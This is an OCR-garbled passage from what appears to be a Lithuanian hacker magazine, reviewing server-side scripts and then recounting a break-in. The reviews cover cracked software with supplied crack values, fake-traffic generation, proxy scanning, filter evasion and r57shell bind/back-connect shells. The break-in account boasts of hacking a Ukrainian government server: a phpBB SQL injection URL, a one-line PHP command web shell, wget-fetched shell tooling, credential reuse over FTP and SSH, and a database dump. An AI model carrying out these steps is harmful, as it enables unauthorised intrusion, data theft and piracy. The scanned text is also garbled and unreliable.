2.0. Aš jį suradau visai neseniai, tačiau Iš karto supratau, jog jis 
yra būtent tai, ko reikia. Miniatiūrinis skriptas, kuris suarchyvuotų 
pavidalu užima viso labo 17 Kb, o savo funkcionalumu nė kiek 
nenusileidžia gigantiškam phpMyAdmin. Spręsk pats: serveryje 
įdiegęs RST MySOL, tu galėsi peržiūrinėti ir redaguoti bet kuras 
bazes, kurios prieinamos su tavo vartotoju, arba net kurti naujas, 
Jeigu tu esi administratorius. Visi veiksmai atliekami vizualiai, tai 
yra intuityviame lygyje. Norint duomenų bazėje paredaguoti, per- 
žiūrėti ar sukurti naują lentelę, tau nereikla mokėti SOL kalbos — 
visa tai už tave padarys RST MySOL 2.0. Jeigu tu nori įtvirtinti 
savo SOL užklausų sudarymo įgūdžius, tai skriptas tau iš viso 
pasirodys puikiu radiniu. Bet kuris veiksmas, kurį jis atlieka, paly- 
dimas SOL užklausos tekstu, taip galima lengvai įvaldyti šią kal- 
bą. Iš pradžių tik stebėdamas, vėliau užklausas gali pabandyti 
sudaryti rankiniu būdu — RST MySOL mielai jas apdoros. Galima 
redaguoti absoliučiai viska: bet kuriuos laukus lenteles (stulpelių 
pavadinimus), jų turinį, ryšius ir panašiai. Įrankyje yra puik! gali- 
mybė kurti duomenų bazės arba atskirų lentelių kopijas (dump), 
kurias tu gali peržiūrėti naršyklėje arba atsisiųsti. Visos šios funk- 
cijos lengvai tilpo į vieną nedidelę bylą, kurios nereikia konfigū- 
ruoti ir kurią galima lengvai perkelti į serverį. 

Alternatyva: WizMySOLAdmin (PHP, wiz.homelinux.net/php.php), 
perlmyadmin (Perl, www.perlmyadmin.de) 


[Back-connect vs. Bind-shell] Labai dažnai normaliam dar- 
bui su nutolusiu serveriu per telnet/SSH trukdo ugniasienė, kuri 
blokuoja iš išorės atkeliaujančius kreipinius į šias jungtis. Tokiu 
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atveju gali padėti du būdai. Abu jie įtraukti i r57shell sudėtį. 
Bind-shell. Skriptas nutolusiame tinklo mazge atidaro soketą 
per tam tikrą jungtį, kurios ugniasienė nefiltruoja (jeigu tokia 
jungtis iš viso yra), ir su juo susieja standartinį basA interpreta- 
torių /bin/bash. Tau telieka su te/net prie jo prisijungti ir mėgau- 
tis gyvenimu. 

Back-connect. Šis būdas tinka tuomet, kai nutolusio tinklo maz- 
go ugniasienės taisyklės filtruoja praktiškai visus prisijungimus, 
todėl nėra galimybės prisibindinti prie kokios nors jungties (kaip 
bind-shell atveju). Naudojantis back-connect reikėtų suprasti 
tai, kad prisijungimą inicijuosi ne tu, o pats serveris, kuris pa- 
bandys prisijungti prie jam nurodyto IP adreso ir jungties. Pri- 
Imančioje pusėje šį susijungimą reikia priimti su stebuklingaja 
programa netcat (netcat.sourceforge.net), po ko jau galima ko- 
manduoti, kaip kad tai daroma įprastiniame shelle. Jeigu bac- 
k-connect sukonfigūruotas veikti per 40000 jungtį, tai netcat 
paleisti reikia maždaug taip: 


dMackar>ncex6 nv —p 40000 

listeninę on [any] 40000 

connect to Įxo.vocx 0) Iro (UNKNOWN) [atavuvouw] 54247 

Linux gw 2.4.8-065 +2 SMP Tue Sep 25 21:36:58 MSD 2001 i686 unknown 
vid=60001 (nobody) gid = 60001 (robod) 


PHP FXP 3.0 


Svetainė: tax p hay pinls 
Atsiradus greito pralaidumo interneto kanalams, vis menkiau 
jaučiama būtinybė lokaliai saugoti kokias nors bylas. Vos tik tų 
spėji idiegti kokią nors programą, internete vėl pasirodo švie- 
žiausias jos leidimas. Google.com kasdien indeksuoja milijo- 
nus dokumentų, iš kurių surasti reikiamą kur kas lengviau. nei 
perrinkinėti diske kažkada išsaugotus web puslapius. Nėra ko 
ginčytis — tai patogu, tačiau su tuo yra ir tam tikrų problemų. 
Pavyzdžiui, man ne kartą teko kopijuoti daug duomenų iš vie- 
no FTP serverio į kitą. Kiekvienas šią užduotį sprendžia sa- 
vaip. Kai kas veiks tiesmukai: Iš pradžių visas bylas parsiųs į 
savo kompiuterį. o po to perkels į reikiamą vietą. Kitas,ne iš 
nuogirdų susipažinęs su FXP technologija, pasinaudos pa- 
žangiu FTP klientu. Tačiau yra dar vienas būdas — pasinau- 
doti specialiai šiai užduočiai pritaikytu skriptu. Galiu drąsiai 
prisipažinti, jog man teko sugaišti nemažai laiko, kol aš su- 
radau kažką veikiančio: nepaisant iškeltos užduoties papras- 
tumo, daugelis skriptų dėl įveirių priežasčių atsisakė korek- 
tiškai veikti. Geriausiai šiuo atveju pasirodė skriptas PHP FXP 
3.0. Norint jį įdiegti, daug pastangų nereikia: pakanka Išpa- 
kuoti archyva su pačiu skriptu ir byloje config.inc.php patai- 
Syti kintamuosius $url bei $path. Po to visas bylas ir katalo- 
gus reikia perkelti į serverį, o po to su chmod pakeisti kata- 
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| PHP FXP įmontuotas FTP klientas: pasirenkam perduodamas bylas 


logo Store ir visų data kataloge saugomų bylų teises į 777. 
Dabar galima naršyklėje atidaryti bylą index.php ir mėgautis 
PHP FXP 3.0 sąsaja. Ką moka šis skriptas? Viso labo per- 
siuntinėti bylas tarp FTP, HTTP bet daugiau iš jo ir nereika- 
laujama, Kai aš siunčiausi šį skriptą, tai galvojau, kad jis, 
kaip ir visi madingi FTP klientai, panaudoja FXP technologiją, 
bet ne. Pasirodė, jog viskas yra priešingai. Skriptui visiškai 
nė motais, ar FTP serveriais įmanomas duomenų perdavi- 
mas panaudojant FXP — jis panaudoja kitą primityvų. tačiau 
visiškai pagrįstą metodą. Byla iš nutolusio serverio pirmiau- 
sia persiunčiama į laikiną katalogą, po ko perduodama į pa- 
skirties serverį. Toks požiūris leidžia bylas perdavinėti ne tik 
iš FTP į FTR bet ir. pavyzdžiui, iš HTTP į FTP ir Lt. Kiti analo- 
giški skriptai turėjo vieną rimtą trūkumą — jie mokėjo perda- 
vinėti tik pavienes bylas. PHP FXP moka rekursyviai pereiti 
katalogų medį ir perduoti ištisus katalogus, išsaugant jų hie- 
rarchiją. 

Tiesiog pasaka, tačiau yra ir vienas „bet“. Kad įrankis nepriekaiš- 
tingai dirbtų, serveryje reikia turėti apčiuopiamą laisvos vietos 
kiekį, kuris turėtų būti bent toks, kiek užima didžiausia iš per- 
siunčiamų bylų. O ir tinklo srauto bus sunaudojama nė kiek ne 


mažiau. Dar daugiau, skriptas veikia tik tuo atveju, jeigu išjung- 
ta PHP safe mode direktyva — prieš pračėdamas eksperiman- 
tus, būtinai išsiaiškink tai su savo tiekėju. 

Alternatyva: X-Uploader (Perl, www.xakep.ru/post/12019). 


FakeZilla Advanced Generatorv2.3 

Platloma: PHP 

Dydis: 196 Kb 

Svetainė: wwwr./akezillo.com 
Padidinti svetainės lankomumą — bet kurio web masterio 
svajonė. Internete kai kurios kontoros iš taip vadinamo SEO 
(Search Engines Optimization — optimizavimas paieškos sis- 
temoms) uždirba nemažai pinigų. Šiandien mes apie SEO 
nešnekėsim, tačiau išsiaiškinsime, kaip viso labo per porą 
minučių galima užtikrinti unikalių tavo svetainės lankytojų 
antplūdį. Savaime suprantama, tai bus ne tikri lankytojai, 0 
viso labo tinklo srautas, kurį emuliuoja specialūs srauto ge- 
neravimo skriptai. Bet kurie reitingai ir servisai, suteikiatys 
galimybę svetainėje turėti lankytojų skaitliuką (pavyzdžiui, 
top.lt), turi specialų mechanizmą, kuris atskiria unikalius 
apsilankymus (hosts) nuo pakartotinų (hits). Tai atliekama 
analizuojant vartotojo-lankytojo parametrus: jo IP adresą, 
taip pat aplinkos kintamuosius, kuriuose yra naršyklės pa- 
vadinimas bei versija, operacinės sistemos tipas, duome- 
nys apie sistemoje įdiegtą kalbą ir tt. Apgauti tokią siste- 
mą sudėtinga. kadangi tam reikia itin kruopščiai padirbinėti 
aplinkos parametrus ir kiekvieną kartą į puslapį užeiti iš Skir- 
tingų IP adresų. Užsiiminėti tuo rankiniu būdu — tikrų tik- 
riausia nesąmonė, kliedesiai, tačiau su šia užduotimi kuo 
puikiausiai susidoroja tokie paketai, kaip FakeZilia. 
Nėra ko slėpti, srauto generatoriai — gana unikalūs ir reti 
skriptai, kurie, priešingai nei forumai, nesivolioja kiekviena- 
me žingsnyje. Pasakysiu dar daugiau: nemokamo, tačiau tuo 
pačiu ir dėmesio verto skripto man surasti taip ir nepavyko. 
Taip taip, FakeZila — taip pat komercinis skuptas, kadangi 
tai yra profesionalus įrankis, todėl jo kūrėjai visiškai pagrįstai 
už jo panaudojimą reikalauja pinigų (nei daug, nei mažai — 
160 dolerių). Kad netuštintų mūsų piliečių kišenių, grupė 
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GTT išleido nulinės versijos FakeŽila (su išojauta kodo sriti- 
mi, kuri atsako Už registraciją). Ją galima parsisiųsti iš čia: 
http://seripts.wmirader.com/phpATM.v.1.10.transla- 
ted.by.GTT.zip. Archyve surask bylą /data/auth ir joje pirmas 
dvi eilutes pakeisk štai kuo: 


30241 3618164f547025a5492e7d05 
341930d55158b742G:c3dsbc60C736 


Po to visas bylas perkelk į savo web serverį ir naršyklėje 
atsidaryk bylą index.php. Tau bus pateiktas autorizacijos pus- 
lapis. Įėjimui pasinaudok šiais vartotojo duomenimis įvar- 
totojas/siaptažodis): warezover/Cycopath. Jeigu viskas pa- 
daryta teisingai, tai vos po akimirkos tu galėsi pastudijuoti 
pagrindinio FakeZila meniu. Kūrėjai išties pasistengė, kad 
dirbti su programa būtų visiškai paprasta. Su interaktyviu 
meniu tu galėsi pridėti kiek tik nori proxy serverių sąrašų, 
Referrers sąrašus (antraštė, kuri parodo nuorodą, iš kurios 
atėjo lankytojas), User-Agents sąrašus (naršyklės pavadini- 
mas ir versija, OS identifikatorius ir kiti parametrai, kurie 
privaloma tvarka perduodami web serveriui). Pastebėtina, 
jog daugybė visų reikalingų bylų jau įtraukta į FakeZilia, ta- 
čiau tu visada galėsi pridėti ir savų. Proxy serverių sąrašus 
galima nusipirkti, o User-Agents ir Referrers galima išgauti 
iš bet kurios web naršyklės logų. Įmontuoti FakeZilia įran- 
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kiai šiuo atveju itin pravers. Paleisti srauto emuliatorių — 
absurdas. Nurodyk tikslų savo web puslapio adresą, pasi- 
rink proxy, Referer, User-Agent bylas ir spausk Run genera- 
tor. Tau bus pateiktas puslapis. kuriame tu realiu laiku ga- 
lėsi stebėti užduoties vykdymą. Su papildomomis opcijomis 
galima apriboti apsilankymų skaičių per valandą ir suminį 
srauto kiekį. Kietas daiktas! 

Alternatyva: Fake Visitors (Perl, Www.mrnicepages.com/fakehits) 


[Iš kur gauti hostingą?] Hostingai būna skirtingi: stabilūs ir 
nelabai, nemokami ir mokami, greiti ir stabdantys. Jeigu nenori 
už tai mokėti, tai teks naudotis nemokama paslauga, tačiau tai 
sukelia daugybę nepatogumų. Visų pirma, nemokami hostingai 
visaip apriboja vartotojų galimybes: apriboja kanalo pralaidu- 
mą, MySOL, PHP ir kituose nustatymuose aktyvuoja nemalo- 
nias direktyvas ir t.t. Antra, jie neatsako už svetainės veikimą ir, 
savaime suprantama, neturi jam įtakos. Jeigu koks nors skrip- 
tas atsisako veikti, vienintelė išeitis — pasinaudoti kitu hostin- 
gu. Nepaisant to, kai kuriais atvejais nemokamus hostingus ga- 
lima panaudoti pakankamai sėkmingai. Gali pamėginti štai šiuos: 
www. 5gigs.com, www.host.sk, Www.freehost4you.com, techi- 
reland.ca. 

Jeigu paklaustumei mano nuomonės, ką rinktis, tai aš ne- 
mokamiems hostingams net neeikvočiau savo laiko. Šian- 
dien nemažai kompanijų siūlo paslaugas, kurių kainos pra- 
sideda nuo 1-2 dolerių per mėnesį. Natūralu, jog už tokius 
pinigus teikiama paslauga tikrai nėra aukščiausios klasės, 
tačiau nedidelei svetainei arba straipsnyje paminėtiems 
skriptams to visiškai pakaks. Šiaip ar taip, tu galėsi pakan- 
kinti hostingo palaikymo tarnybą, paprašyti įdiegti reikia- 
mus PERL arba PHP modulius, į Apache arba PHP nustaty- 
mus įrašyti reikiamą direktyvą. Šiaip pasirinkti mokamą hos- 
tingą nėra paprasta. 


HTTP Proxy Finder 


Patinai PHP 


Svetainė: wiki co 
Kaip jau minėjau, proxy serverių sąrašus galima nusipirkti, 
bet ką daryti, jeigu finansinė padėtis kebli, o rėmėjų neatsi- 
randa? Tokiu atveju galima pabandyti jų (be abejo, proxy ser- 
verių, o ne rėmėjų) susirasti pačiam. Teisingiausias būdas — 


Yndex 


Interneto naršymės per CGIProxy nesukelia diskomiorto. 
Viskas darosi įprastai, Išskyrus kau Lenka matyti adreso įvedimo lauką. 


nuskenuoti IP adresų diapazoną ir patikrinti kiekvieną iš jų, 
ar jame neatidarytos 3128, 8080, 1080 jungtys, t.y. tos, 
per kurias gali būti sukonfigūruoti proxy serveriai. Tai galima 
padaryti su specialia programa (www.stavinvisible.com/in- 
dex.pl/scanning software), tačiau patogiau būtų pasinaudo- 
ti PHP skriptu. Jis gali veikti ištisą parą, o hosterio kanalas 
kur kas platesnis, nei pas tave namie (Įdomu, kaip surea- 
guotų hosteris, gavęs laišką iš labai piktų tavo skenuojamų 
tinklų administratorių — red.past.). 

Šią idėją įgyvendinantis skriptas vadinasi ganėtinai banaliai — 
HTTP Proxy Finder. Viso labo 2 Kb primityvaus kodo, tačiau jis 
veikia! Skripto nereikia konfigūruoti: tiesiog perkelk jį į serverį ir 
iškviesk per naršyklę. Pasirinkęs pradinį ir galutinį skenuojamą 
IP adresą, spausk Find mygtuką. Jeigu tu nurodei gana platų 
diapazoną, skenavimas laiko atžvilgiu gali šiek tiek užtrukti, ta- 
čiau, laimė gamintojai susiprotėjo skenavimo rezultatus atvaiz- 
duoti realiu laiku. 

HTTP Proxy Finder turi du trūkumus. Visų pirma, šį primityvą 
kūrėjai bando prastumti už pinigus, tačiau tai lengva išspręsti, 
kadangi geri žmonės seniai internete pateikė „pagydyta“ versi- 
ją — Attp://seripts.wmtrader.com/HTTP Proxy. Finder.PHRNULL 
DGT.zip. Antra, programoje neįdiegtas daugiasrautiškumas, kas 
esminiu būdu veikia skenavimo greitį (be abejo, neigiama pras- 
me). Jeigu nori kelių srautų, teks paleisti keletą skripto kopijų. 
O gaila... 


CGIProxy 2.0.1 

Platforma: Perl 

Dydis: 92 Kb 

Svetainė: www.jmarshall.com/taals/egiproxy 
Kartą man prireikė proxy serverio, bet... Pasirodo, surasti sta- 
bilų, greitą ir nemokamą proxy serverį ne taip jau paprasta. 
Tuomet man į galvą šovė mintis pasinaudoti skriptu- 
anonimizatoriumi (anonymizer), kurį aš idiegiau greitame hos- 
tinge. Iš esmės tai tas pats proxy serveris, kuris veikia per 
naršyklę. 
Po keleto eksperimentų tapo aišku, kad yra tik vienas visus 
mano reikalavimus atitinkantis skriptas — CG/Proxy. Jį įdiegti 
nėra sudėtinga. Pačiu paprasčiausiu atveju tereikia išpakuo- 
ti archyvą ir į serverį nukopijuoti bylą nph-proxy.cgi, tuo pačiu 
suteikiant teises ją vykdyti (777). Galima pasielgti dar pa- 
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Transfer files 


Start transfer! 


prasčiau ir pasinaudoti specialia web įdiegimo priemone 
www.xav.com/cgi-sys/cgiwrap/xav/install.cgi?p=cgiproxy. Po 
to, kai įdiegimas užbaigtas, surink skripto adresą ir mėgau- 
kis rezultatu. 

Pagrindinis skripto langas - tekstinis laukas, į kurį reikia įves- 
ti internetinį adresą, ir keletas opcijų, turinčių įtakos naršy- 
mui. Viskas, ko reikia norint pradėti darbą surinkti reikia- 
mos svetainės arba FTP serverio adresą ir nuspausti Begin 
browsing. Iš karto po to pasirodo langas su dviem rėmeliais 
(frames): viename jų bus atvaizduojama pasirinkta web sve- 
tainė, o kitame adreso eilutė bei naršymo parametrai. Nar- 
šymas vyksta taip, lyg tu dirbtum tik su naršykle. Skirtumas tik 
tas, kad naujos svetainės adresą reikia įvesti ne naršyklės, 0 
CGIProxy adreso eilutėje. 

Tu bet kuriuo metu gali pereiti kitu adresu, per šį „proxy“ 
atsidaryti naują langą, išjungti sausainukų (cookies) naudoji- 
mą arba paredaguoti jau turimus sausainukus. Anonimišku- 
mo užtikrinimui rekomenduojama išjungti skriptų palaikymą 
(opcija No scripts) bei tavo aplinkos kintamųjų perdavimą 
(opcija No referrer). 

Iš karto tampa aišku, kad CG/Proxy projektas tobulinamas ne 
pirmus metus — viskas apgalvota iki smulkmenų ir veikia be 
priekaištų. | mūsų žurnalo FAO jau keletą kartų buvo atsiųstas 
klausimas, kaip galima būtų apeiti korporatyvinę ugniasienę ir 
proxy serveri, kurie filtruoja visus MP3, XXX ir kitas pramogines 
svetaines. Taigi CG/Proxy padės ne tik nuslėpti tikrąjį IP adresą, 
bet ir apeiti visus tokio tipo apribojimus. Tai įmanoma dėl to, 
kad tavo lankomos nuorodos koduojamos ypatingai: programi- 
nė įranga negali jų išanalizuoti, o atitinkamai ir nufiltruoti. 
Alternatwa: Poxy (PHP www.sourceforge.net/projects/poxy). SBP 
(PHR sourceforge.net/projects/sbp) 


[Mąstyk galva] Skriptai — ne panacėja nuo visų bėdų. Jų 
panaudojimas iš tiesų dažnai būna efektyvus, tačiau tai pa- 
siteisina anaiptol ne visada. Reikia blaiviai įvertinti, kada ge- 
riau naudoti skriptą, kada — programą, o kada — pašalinį 
servisą. Jeigu man reikėtų trūks plyš užtikrinti savo anoni- 
miškumą, aš nė už ką nenaudočiau CGIProxy. Nepaisant to, 
kad nėra jokio registravimo, visi kreipiniai į ji puikuojasi web 
serverio |oguose. 


Prosy Findo' 


Ieškom proxy serverių diapazone 62.148.128.1-148.128.100 


0: Bet kuriame BIOS'e yra punktas Boot 

Virus Detection. Nepamenu, kad bent kar- 

tą jis būtų suradęs virusą. Ar šis antivi- 
rusas veikia? 


A: Dar ir kaip veikia! Tiesa, tai ne antivirusas, 
o viso labo virusų aptikimo įrankis. Ir aptinka 


Jis ne visą užkratą, 0 tik užkrovėją, kuris gali 
įsirašyti į kompiuterio flash atmintį. Tiesa, šian- 
dien tokie virusai nėra labai paplitę, todėl šios op- 
cijos reikalingumas gana abejotinas, Geriau įdiek 
šviežius Windows sistemos atnaujinimus. 


()) 0: Ar galima dabar užregistruoti domeną 
naujoje „EU zonoje? 


A: Deja. ne. Domenų registracija užsiima 
tarptautinis EURid konsorciumas (Www.eu- 


rid.eu/en/registrant). Tuo pačiu į rezervuotus 

domenų vardus teisę kol kas turi prekių žen- 
klų savininkai, vyriausybinės organizacijos ir kom- 
panijos. Nuo 2006 metų balandžio 7 dienos do- 
meną užregistruoti galės kiekvienas, kas gyvena 
Europos Sąjungoje arba kas ten turi savo verslo 
filialą. Įdomu, jog per 15 domeno zonos egzista- 
vimo minučių buvo pateikia 40 tūkstančių do- 
meno registravimo paraiškų. Ar vis dar tikiesi už- 
registruoti gardųjį sex.eu? :) 
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Kavos puodukas 


KARTAIS IŠ NETURĖJIMO KĄ VEIKTI IR VIE- 
NO IŠGERTO KAVOS PUODUKO PADARO- 
MA NEĮTIKĖTINŲ DALYKŲ. PAVYZDŽIUI, PER 
PORĄ VALANDŲ BE YPATINGO VARGO NU- 
LAUŽIAMAS VYRIAUSYBINIS UNIX SERVE- 
RIS. ŠĮ KARTĄ BŪTENT TAIP NUTIKO, AŠ PA- 
JUTAU MANE UŽPLŪSTANTĮ KŪRYBIŠKUMĄ, 
MALONŲ PIRŠTŲ GALIUKŲ KUTENIMĄ, UŽ- 
SIVIRIAU PUODUKĄ TIRPIOS KAVOS IR IŠ- 
KELIAVAU PASITIKTI NUOTYKIŲ. 


Vieno vyriausybinio 

serverio nulaužimo istorija 

[Mano priešo akys] Po įkyrių pokalbių viename IRC 
kanale man prireikė aštrių pojūčių. Neilgai galvojęs, ad- 
reso eilutėje aš įvedžiau gerai visiems žinomą paieškos 
svetainės adresą www.google.com. Kaip įprasta, prieš 
mano apsimiegojusias akis pasirodo mano užklausos 
laukianti paieškos eilutė. Laužti kokią nors parastą sve- 
tainę man visiškai nesinorėjo, todėl aš nusprendžiau, 
Jog šią naktį mano tikslas bus svetainė iš .gov zonos. 
Mano galvoje šmėkštelėjo mintis, kad paprastai visi wy- 
riausybiniai serveriai neprieinami, juos nulaužti labai 
sunku, o kartais net neįmanoma. Tačiau kaip ten rekla- 
moje sakoma? „Neįmanoma sako tik bailiai“. Taigi aš 
gūglei sušėriau užklausą inurl „gov ir pradėjau studijuoti 
vyriausybinių serverių sąrašą. Nieko įdomaus nesima- 
tė, aš verčiau puslapius, o iš pirmo žvilgsnio nebuvo Už 
ko užsikabinti. Ir staiga prisiminiau, kad greitai bus ma- 
no draugo iš Ukrainos gimtadienis ir kad aš jam paža- 
dėjau padovanoti shellą kokiame nors Ukrainos serve- 
ryje. Ką gi, šiandien mes suderinsim malonumus su 
naudingais dalykais. 


[Į klaidų paiešką!] Pasakyta — padaryta, užklausa pa- 
sikeitė į inurl „gov.ua. Aš ilgai neieškojau ir spustelėjau 
pirmą po akimis pasipainiojusią nuorodą. Ir čia aš pir- 
mą kartą Ailgtelėjau į savo būsimos aukos „veidą“ 

Prieš pradėdamas kapstyti svetainę, nusprendžiau šiek 
tiek apsisaugoti. Aš pasibeldžiau pas savo seną draugą 
į ICO ir paprašiau jo greito ir anoniminio proxy serverio. 
Po penkių minučių mano prašymas buvo įvykdytas ir pro- 
xy serveris jau buvo mano rankose. Aš važiavau toliau. 
Iš monitoriaus į mane žvelgė neblogas dizainas, grei- 
čiausiai prie viso šito padirbėjo profesionalaus svetai- 


nių kūrėjo rankos. Vis dėlto mano 
tos nakties planuose nebuvo di- 
zaino keitimo. Aš greitai perbėgau 
per kelias nuorodas ir supratau, 
kad svetainės varikliukas parašy- 
tas su php, 0 tai mane džiugino, kadangi ieškoti php skriptų 
klaidų — vienas malonumas. Aš pradėjau pakišinėti įvairius skrip- 
tus, taip ieškodamas include klaidos, bandžiau su skriptais re- 
alizuoti są! injekcija, bet taip nieko ir negavau! Susierzinęs tokia 
nesėkminga klaidos paieška jau norėjau viską mesti ir eiti mie- 
goti, kai staiga pro vos pramerktas akis pačioje apačioje paste: 
bėjau nuorodą į forumą. Ir ką gi tu manai? 

Be abejo, pasikartojo sena istorija, kurioje dalyvavo mūsų mė- 
giamas phpBB. Tiesa, resurso administratorius nebuvo Visiš- 
kas nevykėlis ir atnaujino forumo versiją iš liūdnai pagarsėju- 
sios 2.0.10 iki 2.0.13. Staiga aš prisiminiau, jog nesenai skai- 
čiau apie šioje forumo versijoje surastą pažeidžiamumą, kitaip 
tariant, ne pačiame forume, 0 modulyje downloads.php. Aš nu- 
sprendžiau išbandyti laimę ir pabandyti pasinaudoti šia saugu- 
mo spraga. Visų pirma reikėjo išsiaiškinti, ar forume įdiegta 
pažeidžiama byla. Aš į adreso eilutę įvedžiau www.victim.gov.ua/ 
forum/downloads.php. Iš karto, kai puslapis užsikrovė, tapo aiš- 
ku, jog šį vakarą Fortūna man šypsosi: laužiamame resurse bu- 
vo įdiegtas pažeidžiamas skriptas, Jeigu tu reguliariai skaitai 
mūsų žurnalą, tuomet pameni, jog eksploitų apžvalgoje mes 
nesenai rašėm apie pe/! skriptą, kuris išnaudoja downloads.php 
klaidą ir taip gauna tam tikro vartotojo md5 hešą. Savaime 
suprantama, mane domino administratoriaus slaptažodis. Taigi 
aš iš www.xakep.ru/post/26131/exploit.Lxt parsisiunčiau eks- 
ploitą ir užsiundžiau jį ant forumo: 


SJ Zip pl ve: vicim.gov.uk forum 2 
[- ] Comeding 

[+] Comeced 

[-] Sending Data... 

[ ] Data Sent, Naiting for response. 
[+] MD5 Hash for user vith id= 2 is: 
aeldėadža1de312b4b13d456918C816b 


Pamatęs administratoriaus slaptažodžio md5 hešą, aš tiesiog 
nepatikėjau savo akim. Nepaisant to, jog apie šią klaidą jau 
žinoma pana ilgai, adminas nepasistengė surasti laiko skylėms 
užlopyti, todėl turėjo sumokėti už tokį savo apsileidimą :). Ka gi. 
tęsim. Reikia pastebėti, kad man nereikėjo forumo administra- 
toriaus teisių, tačiau jos labai praverstų kaip tarpinis kelias pa- 
keliui link veikiančio shello. 

Norint į forumą įeiti administratoriaus teisėmis, reikia jame Už- 
siregistruoti, 0 po to paredaguoti savo sausainukus (tai galima 
padaryti su Cookie editor), pakeičiant juose esančius identifi- 
katorius į nugvelbtuosius. Po to galima įeiti į forumą administ- 
ratoriaus teisėmis ir pasinaudojus tuo pačiu moduliu persiųsti 
mod attach, maždaug tokio turinio php skripta: 


? 
system($ GET[cmd)); 
2 


Šis paprastas skriptas man Jeido serveryje vykdyti komandas 
Apache serverį paleidusio vartotojo teisėmis. Pirmas dalykas, 


kuri aš nusprendžiau padaryti — parsiųsti į serverį patogesnį 
darbo su failų sistema skriptą. 

ĮSėkmė kišenėje] Aš nusprendžiau neapsistoti ties kokiais 
nors standartiniais remview tipo skriptais ir pasiėmiau vi- 
siškai naują ir dar mano neišbandytą skriptą — NIX REMO- 
TE WEB SHELL. 

Po neilgai trukusių paieškų aš pastebėjau katalogą temp, į 
kurį buvo galima rašyti duomenis. Serveryje buvo įdiegtas wget. 
Aš sklandžiai parsisiunčiau sistemą ir dabar galėjau su ser- 
veriu dirbti naudodamasis patogia sąsaja. Šioje situacijoje 
didelis privalumas tas, kad forumas kartu su svetaine buvo 
įdiegtas tame pačiame serveryje, todėl per forumą gavus web 
shellą man atsivėrė kelias į serverio širdį. Ilgai nesvarstęs, 
įvedžiau šią komandą: uname -a. Pasirodo, mašinoje veikė 
FreeBSD 5.2.1-RELEASE. Galvoje praūžė nelinksma mintis: 
viešo šiai sistemai skirto eksploito dar nebuvo, o ir prašyti 
nebuvo iš ko :(. Ka gi, telieka vadovautis logika. Aš nuspren- 
džiau iš karto patikrinti forumo konfigą, todėl įvykdžiau štai 
šią komandą: 


+ cat canfig.php 

Sabms = "mysąl'; 

Sahhost = "localhost; 
Sdbname = "smido forum; 
Sdbuser = 'smido'; 
Sdbpasswd  "kBB3R2LU4x; 


„Ką tau gali duoti konfigas?“ — paklausi tu. Nieko baisiai svar- 
baus. tačiau galima pabandyti prisijungti į serverio ftp. pasinau- 
dojant duomenų bazės vartotojo vardu ir slaptažodžiu. Galbūt 
mane įleistų į serverį. Taip ir nutiko: aš prisijungiau prie serve- 
rio, o sėkmė vėl buvo mano pusėje. 

Pamaniau, kad jeigu su ftp pavyko susijungti be trukdžių, tai 
kodėl gi man nepabandžius padaryti to paties su ssh? Iš džiaugs- 
mo mano akys išvirto iš orbitų lyg kvanktelėjusios makakos, ku- 
rios nešėrė mažiausiai penkerius metus :). Kaip tu jau tikriau- 
siai supratai, susijungti pavyko, ir aš turėjau pilnavertišką įėjimą 
į sistemą. 

Taigi draugo prašymą aš jau įvykdžiau. Dabar reikėjo nuspręsti, 
ką aš dar galėčiau gauti iš šio serverio. Juk pasistengti reikia ir 
dėl savęs :). Nusprendžiau pasidaryti serverio duomenų bazių 
kopiją, kas su skriptu daroma dviem klavišo paspaudimais. Aš 
tai padariau labai greitai, todėl dabar pas mane buvo visa šios 
svetainės DB. Mano smegenyse dar gyvybės ženklus rodantys 
kofeino likučiai patarė žvilgtelėti į viso serverio šakninį katalogą: 
galbūt pavyks surasti dar ką nors įdomaus. 

Kaip bebūtų keista, man lengvai pavyko pereit į failų siste- 
mos šaknį ir leistis į kelionę per katalogu medį. Vos nepa- 
springau išvydęs, kad šiame serveryje saugoma dar apie de- 
šimt svetainių, tarp kurių buvo ir dar viena iš govua vardų 
zonos. | katalogą su šia ką tik surasta svetaine mane įleido, 
tačiau tai jau nebuvo taip svarbu, ir aš nusprendžiau pailsėti. 
Laikrodis rodė 5:01, švito. Pro mano pravirą orlaidę sklido 
ryto gaivos kvapas. Aš buvau labai patenkintas savimi, nes 
pirmą kartą mano praktikoje įsilaužti buvo taip lengva. Dabar 
galima ramiai užmigti. 

Ryte aš pasveikinau draugą su gimtadieniu ir padovanojau per 
naktį sužvejotą shellą. Iš džiaugsmo jis mane tiesiog užbombar- 
davo padėkomis :). 


[Moralą galima rasti visur] Pats pamatei, kaip kartais lengvai 
atliekamas vyriausybinio turto laužimas :). Dėl vaikiškos forume 
slypėjusios klaidos nukentėjo visas serveris. Nekartok tų pačių 
klaidų, stenkis atnaujinti visą programinę įrangą ir visus savo 
serverio skriptus, nes tuomet žymiai sumažės tavo sistemos 
nulaužimo tikimybė. Ir dar norėčiau kai ką pridurti. Galbūt tai 
jau buvo sakyta šimtus kartų, tačiau aš vis tiek pasikartosiu ir 
priversiu blaiviau pažvelgti į kai kuriuos dalykus. Mano nuomo- 
ne, nėra saugios programinės įrangos. Visa esmė tame, kad 
vienose programose klaidų mažiau, o kitose daugiau. Jeigu tu 
manai, kad naudoji visiškai saugią programinę įrangą, tai žinok: 
atsiras toks gudrutis, kuris nepatingės ir tave nulauš. 


[Kas tai per klaida?] Lengva numanyti, kad vartotojų hešų 
išgavimas iš DB atliekamas panaudojant są! injekciją. Iš tie- 
sų, žvilgtelėjus į eksploito kodą, galima pastebėti, kad jame 
sudaroma paprasčiausia union užklausa, kuri tuščią išvedimo 
srautą sulipdo su dar viena užklausa, kuri gauna vartotojo slap- 
tažodžio hešą: 


lownloads.php?cai:=-19620UNION56205ELECT96200, user pas 
sword,.0,0,0,0,0,0,09620FROM9620phpbb useisė620VIHERE3620user id Suser it“ 


Tiesiog vaikiška klaida, tačiau dėl jos jau nukentėjo nemažai 
serverių. Taigi nepatingėk Ir į sistemos kodą pridėk cat kintamo- 
jo patikrinimą: pagal programos logiką tai gali būti tik sveikas 
skaičius (integer). Taip pat gali parsisiųsti atnaujinimą, kuris ap- 
dairiai laukia adresu www.phpbb.com/phpBB/viewto- 
pic.php?t= 74505. 


NIX REMOTE WEB SHELL 0.5a Lite 

Štai keletas skripto galimybių: 

1. Autorizacijos galimybė kreipiantis į skriptą; 

2. Informacija apie sistemą: 

- Serveris; 

- OS; 

- privilegijos; 

- einamas katalogas; 

- tavo IP; 

— PHP version; 

— proceso savininko ID; 

- MyS0L info; 

